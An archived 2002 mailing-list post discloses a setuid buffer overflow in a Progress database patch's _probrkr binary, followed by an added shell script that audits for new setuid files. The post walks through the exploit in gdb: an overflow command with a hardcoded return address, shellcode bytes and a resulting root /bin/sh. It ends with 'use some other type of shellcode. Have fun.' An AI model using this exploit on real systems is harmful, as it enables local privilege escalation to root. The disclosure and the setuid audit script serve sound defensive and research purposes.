Vulnerability Development mailing list archives
latest Progress patch has suid issues AGAIN.
From: KF <dotslash () snosoft com>
Date: Wed, 01 May 2002 22:36:38 -0700
Due to a flat-out NO in response to my offer, once again, to help Progress with their security issues, they have not been notified about this issue. If there are any people from the PEG reading, please clue your friends in... http://www.peg.com/usgrp.html
-KF
Progress 9.1C11 Patch date 2002/04/26
http://www.progress.com/patches/patchlst/91C-178v.htm

Once again, by ignoring my warnings and suggestions and even offers to audit code prior to release to the public, Progress Software has happened upon a security hole. If you will recall from last month, Progress likes to GIVE you suids in their patches. Last month they GAVE us sqlcpp. Well, they decided that in this patch they would fix sqlcpp, as you can see here...

    20020403-020 * utilities: sqlload, sqldump, sqlschema
    Security Bug: A buffer overflow has been reported in the sqlcpp program
    included with Progress, used as a SQL preprocessor.

...and then be soooo generous as to GIVE you yet another suid binary and yet ANOTHER security risk to worry about. I can't say that this file was part of my last release... looks like fun though.

[root@ghetto bin]# ls -al _probrkr
-rwsrwxr-x    1 1089     110        268306 Apr 22 15:23 _probrkr
[root@ghetto bin]# ./_probrkr -S `perl -e 'print "A" x 100'`
01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
** Unable to create dataserv.lg, errno = 13 (609)
01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unable to open or create dataserv.lg, error 13. (2257)
01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
** Unable to create ds_32638.lg, errno = 13 (609)
01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unable to open or create ds_32638.lg, error 13. (2257)
01:19:15 (pid 32638) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Unable to open dataserver log file. (2683)
01:19:15 (pid 32637) BROKER Service: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
** This process terminated with exit code 2. (8619)

Hrmm, let's try again.

(gdb) r -S `perl -e 'print "A" x 564'`
Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print "A" x 564'`

Program received signal SIGSEGV, Segmentation fault.
0x08071725 in stncop () at eval.c:41
41      eval.c: No such file or directory.
        in eval.c
(gdb) bt
#0  0x08071725 in stncop () at eval.c:41
#1  0x080629e2 in dblgm () at eval.c:41
#2  0x20200a20 in ?? () at eval.c:41
Cannot access memory at address 0x41414141

That's usually not good. =]

(gdb) frame 2
#2  0x20200a20 in ?? () at eval.c:41
41      in eval.c
(gdb) i r
eax            0xbffff48b       -1073744757
ecx            0xffffffed       -19
edx            0x20202020       538976288
ebx            0x8079d28        134716712
esp            0xbffff1f0       0xbffff1f0
ebp            0x41414141       0x41414141
esi            0x2f     47
edi            0xbffff500       -1073744640
eip            0x20200a20       0x20200a20
(gdb) frame 3
Cannot access memory at address 0x41414141

That means it's owned for sure, I believe.... drop some shellcode on the stack... do a lil ninja and voila.

(gdb) x/10s 0xbffffeba+10
0xbffffec4:      "1À1Û°\027Í\200ë\037^\211v\b1À\210F\a\211F\f°\013\211ó\215N\b\215V\fÍ\2001Û\211Ø@Í\200èÜÿÿÿ/bin/sh"
(gdb) r -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/91c11/bin/./_probrkr -S `perl -e 'print "\xc4\xfe\xff\xbf" x 150'`
01:02:59 (pid 1463) BROKER Service: Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿ 1À1Û°Íë^1ÀFF ° óV Í1ÛØ@ÍèÜÿÿÿ/bin/sh

Hrmm, that's hardly the output I was expecting... An associate of mine noted that you could tamper with the inputs of various functions. One thing you really need to note above is "01:02:59 (pid 1463)". Something was spawned as a child process... check the pid 1463...

root      1463  1460  0 01:02 pts/0    00:00:00 /bin/sh

How nice, a shell spawned by the _probrkr parent id:

root      1460  1413  0 01:02 pts/0    00:00:00 /home/91c11/bin/./_probrkr -S Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ¿Äþÿ

Do a quick strace on it...

[40057a01] --- SIGTTIN (Stopped (tty input)) ---
[400578ef] rt_sigaction(SIGTTIN, {SIG_IGN}, {SIG_DFL}, 8) = 0
[4010fac4] ioctl(255, 0x540f, [1460]) = 0
[400578ef] rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_IGN}, 8) = 0
[40057a01] kill(0, SIGTTIN) = 0
[40057a01] --- SIGTTIN (Stopped (tty input)) ---

If you strace that bash shell you can see that it is flipping out about not having a tty... Progress won't let us type in an interactive sh prompt, so use some other type of shellcode. Have fun.

-KF
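The recurring complaint in the post is that a vendor patch quietly installs a new setuid binary. The following POSIX shell audit is an added example (not from KF's post and not a Progress tool): it snapshots the setuid/setgid files under an install tree before a patch and reports anything that appears afterwards, with numeric owner and mode as in the ls listing above. The install root and baseline file name it takes are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original post: audit an install tree for
# setuid/setgid binaries and diff the result against a baseline taken
# before a patch was applied. The tree path ($1) and baseline file ($2)
# are assumptions; any directory and file name work.

# Print every setuid or setgid regular file under a tree, one path per
# line, sorted so the list can be compared with comm(1). Permission
# errors are silenced because the audit may run as an unprivileged user.
suid_list() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null | sort
}

# For each path read on stdin print "mode uid gid path", e.g.
# "-rwsrwxr-x 1089 110 /home/91c11/bin/_probrkr", so a group-writable
# suid (as _probrkr shipped) is visible at a glance.
suid_describe() {
    while IFS= read -r f; do
        # ls -ln prints uid/gid numerically, matching the post's listing
        set -- $(ls -ln "$f")
        printf '%s %s %s %s\n' "$1" "$3" "$4" "$f"
    done
}

# Report setuid/setgid files present now that were absent from the
# baseline. Exit 0 when nothing new appeared, 1 otherwise, so a
# deployment script can refuse to proceed on an unexpected suid.
suid_new() {
    tree=$1; baseline=$2
    added=$(suid_list "$tree" | comm -13 "$baseline" -)
    if [ -z "$added" ]; then
        return 0
    fi
    printf '%s\n' "$added" | suid_describe
    return 1
}

# Typical use, with the post's install root as an assumed example:
#   suid_list /home/91c11 > suid.before     # before applying the patch
#   ... apply the vendor patch ...
#   suid_new /home/91c11 suid.before        # lists anything new, exits 1
```

Run the baseline step on a known-clean install; a non-zero exit after the patch is the cue to inspect the new binary before it goes anywhere near production.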